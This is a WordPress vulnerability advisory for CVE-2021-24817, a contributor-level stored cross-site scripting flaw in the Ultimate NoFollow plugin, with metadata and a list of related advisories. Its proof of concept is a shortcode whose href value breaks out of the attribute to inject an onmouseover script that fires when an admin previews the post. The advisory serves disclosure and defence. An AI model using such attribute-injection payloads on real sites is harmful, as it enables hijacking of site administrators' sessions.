Ultimate NoFollow <= 1.4.8 – Contributor+ Stored Cross-Site Scripting | CVE 2021-24817 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape the href attribute of its shortcodes, allowing users with a role as low as contributor to perform Cross-Site Scripting attacks

Proof of Concept

Affected shortcodes: nf, nofo, nofol, nofollow, relnofollow

As a contributor, put the below shortcode in a post/page
[nf href='https://test" style="position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px" onmouseover="alert(/XSS/)']test[/nf]

The XSS will be triggered when the post is previewed (for example by an admin when reviewed)/viewed

Affects Plugins

No known fix

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Quentin VILLAIN (3wsec)

Submitter

Quentin VILLAIN (3wsec)

Submitter website

https://3wsec.fr

Verified

Yes

WPVDB ID

ccb27d2e-2d2a-40d3-ba7e-bcd5e5012a9a

Timeline

Publicly Published

2021-11-15 (about 2 years ago)

Added

2021-11-15 (about 2 years ago)

Last Updated

2022-04-11 (about 2 years ago)

Other

Published

Title

Published

2021-11-29

Title

WP Remote < 4.65 - Reflected Cross-Site Scripting

Published

2024-02-29

Title

Visual Composer Premium < 45.7.0 - Authenticated (Contributor+) Stored Cross-Site Scripting

Published

2024-04-04

Title

Happy Addons for Elementor < 3.10.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via Calendy

Published

2023-02-21

Title

Japanized For WooCommerce < 2.5.5 - Reflected XSS

Published

2015-03-26

Title

Flashy Theme <= 1.3 - Cross-Site Scripting (XSS)